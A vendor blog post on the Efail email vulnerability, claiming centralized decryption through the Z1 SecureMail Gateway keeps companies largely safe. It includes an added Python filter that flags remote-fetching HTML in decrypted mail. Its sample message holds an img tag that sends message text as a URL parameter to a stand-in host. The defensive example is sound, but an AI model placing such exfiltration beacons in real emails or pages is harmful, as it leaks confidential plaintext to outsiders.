What does Efail mean for companies?

Comments & Campaigns | 30. MAY 2018

Why email encryption using the Z1 SecureMail Gateway remains a secure option

After the first wave of misinformation, it should by now be widely understood that email encryption has not been cracked by the Efail security vulnerability and that the German Federal Office for Information Security (BSI) continues to recommend the encryption of emails. Generally speaking, companies that use professional encryption solutions in professional infrastructures do not need to worry.

The fact is that companies and public authorities that use Z1 SecureMail Gateway for email encryption generally have an advantage, against Efail and other types of attacks on emails, over private users and companies with single-workstation solutions for email encryption. In professional infrastructures, encryption and the preparation of content for displaying emails are separate procedures, which is why a manipulation such as Efail should have virtually no chance of success (you can find details about the attack at efail.de).

The path of an incoming email in a professional IT environment using the Z1 SecureMail Gateway

  1. Z1 SecureMail Gateway receives and decrypts emails at a central point in the company network. The Gateway does not process the contents of the decrypted email. This prevents the Gateway from running any infiltrated code through which information could be evaluated or rerouted.
  2. The Gateway routes the decrypted email, in plaintext, through the firewall-protected company network directly to the content filter or virus scanner.
  3. The content filter / virus scanner then checks for and removes any malicious content in the decrypted email. This includes viruses, Trojans and ransomware, as well as any hidden HTML and JavaScript instructions that, as in the case of Efail, attempt to send an email’s decrypted plaintext as a parameter to an external URL.
  4. The content filter relays the innocuous email on to the email server on which the recipient’s mailbox is located.
  5. The email is retrieved from the mailbox using the email client (e.g., Outlook or Thunderbird) and displayed to the user.

Only in the email client can any malicious code that has not been detected and removed by the content filter be executed. This can be counteracted by restricting the display of emails to plaintext.
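The check described in step 3, as an added example (not Z1 SecureMail Gateway code or any vendor's implementation): it parses an already decrypted message and flags HTML that would make a mail client contact an external URL without user interaction. The rule set, the function names and the sample message are assumptions constructed for illustration.

```python
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed rule set: attributes a mail client may fetch without a click.
FETCH_ATTRS = {"src", "srcset", "background", "poster", "data"}
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

def is_remote(url):
    parts = urlsplit(url.strip())
    # Absolute http(s) URLs and protocol-relative URLs ("//host/path") leave the network.
    return parts.scheme in ("http", "https") or (not parts.scheme and bool(parts.netloc))

class RemoteRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-tag", tag, ""))
        for name, value in attrs:
            auto = name in FETCH_ATTRS or (tag == "link" and name == "href")
            if auto and value and is_remote(value):
                self.findings.append(("remote-fetch", tag, value.strip()))

def scan_message(raw):
    """Return findings for every text/html part of an already decrypted message."""
    findings = []
    for part in message_from_string(raw, policy=policy.default).walk():
        if part.get_content_type() == "text/html":
            finder = RemoteRefFinder()
            finder.feed(part.get_content())
            finder.close()
            findings.extend(finder.findings)
    return findings

def verdict(raw):
    return "quarantine" if scan_message(raw) else "deliver"

# Constructed sample message (not taken from a real attack).
SAMPLE = """\
From: sender@example.org
Subject: constructed sample
Content-Type: text/html; charset="utf-8"

<img src="http://collector.example/p?d=Quarterly%20figures" width="1" height="1">
<script>void 0</script>
<a href="https://www.example.com/report">report</a>
"""
```

Ordinary links that need a click and inline `cid:` images are left alone. A mail client restricted to plaintext display, as recommended above, remains the backstop for anything such a filter misses.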

In professional IT infrastructures, security settings are implemented centrally in order to minimize user errors. In utilizing the Z1 SecureMail Gateway, companies take advantage of the highly efficient centralized administration of organization-wide security.
The general concept of centralized IT security solutions is, through the use of standardized processes and automation, to relieve single users of responsibility. As a result, companies with the right infrastructure always have an advantage against attacks on poorly-configured end systems and terminal equipment, as well as potential user misconduct.